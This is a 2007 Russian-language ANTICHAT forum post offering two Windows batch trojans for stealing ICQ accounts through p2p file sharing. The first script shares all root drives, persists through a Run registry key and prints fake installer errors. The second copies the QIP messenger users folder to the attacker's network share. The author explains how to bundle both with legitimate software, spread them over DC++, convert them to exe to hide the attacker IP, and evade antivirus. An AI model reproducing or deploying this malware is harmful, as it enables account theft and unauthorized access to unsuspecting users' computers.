HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > ICQ
Перезагрузить страницу Угон через p2p
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #21  
Старый 19.09.2007, 14:14
life_is_shit
Постоянный
Регистрация: 21.08.2007
Сообщений: 367
Провел на форуме:
3578960

Репутация: 468
Отправить сообщение для life_is_shit с помощью ICQ
По умолчанию
***Добавлю ищо от себя***

Да ламеров в сети много, но заветные шестизнаки обычно не у них.(
Я поступил таким образом.
Сделал два .bat файла.

Первый более универсальный, но и более паливный:
Цитата:
@echo off
if exist c:\Windows\windll.bat goto A
copy windll.bat c:\Windows\
:A
net start server
net share C=c:\
net share E=e:\
net share D=d:\
net share F=f:\
net share G=g:\
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run /v windll.lib /t REG_SZ /d C:\Windows\windll.bat
echo extract cab12023043444
echo ......................
echo error 346: file cab2032523553 not found.
echo abort install...
pause
Что делает: при запуске расшаривает корневые диски винды, копирует себя в виндовую папку под названием windll.bat (естествено переименуйте), и создает ключик в реестре в автозапуске.
строк типа: echo extract cab12023043444 - должно быть много, чтобы юзер ничего не заподозрил.
Впаривание: берем программку типа Smart installer (на секьюритилабе есть), берем кокуюнить полезную прогу и с помощью этого инсталлера прилепляем её запуск при установке программы. Либо любой другой способ для впаривания троянов. И расшариваем в ДС++(или другом p2p-клиенте), чтобы мы могли видеть кто скачивает прогу.
Ещё: антивирями естественно не палица, но в ехе конвертировать не советую(хотя желательно, дабы юзверь сорцы не посмотрел) ибо аваст почему-то ругнулся на него, каспер и нод32 молчат.

Второй, конкретно для квипа:
Цитата:
@echo off
echo please wait...
IF EXIST "C:\Program Files\QIP\users" copy /Y "C:\Program Files\QIP\users\*" "C:\shared" /Y
IF EXIST "C:\Program Files\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
IF EXIST "D:\Program Files\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
IF EXIST "C:\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
IF EXIST "D:\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
echo ......................
echo error 346: file cab2032523553 not found.
echo error 346: file cab2032523554 not found.
echo error 346: file cab2032523555 not found.
echo abort install...
pause
Что делает: для начала расшариваем у себя папку shared на полный доступ, бат'ик смотрит наличие папок с установленным квипом и копирует содержимое папки users к вам на машину.
Впаривание: аналогичное первому.
Еще: его нада конвертить в ехе, ибо светица ip. антивирями тоже не палица.


З.Ы. Очень желательно изменить код под свои цели)
З.Ы.Ы. если кому-то нада подробно обьяснить устройство и принцип работы - пишите в личку.
Последний раз редактировалось life_is_shit; 19.09.2007 в 14:18..
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Через какие почт. сервисы можно отправлять не через 25 порт Gawab Болталка 1 12.05.2007 19:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ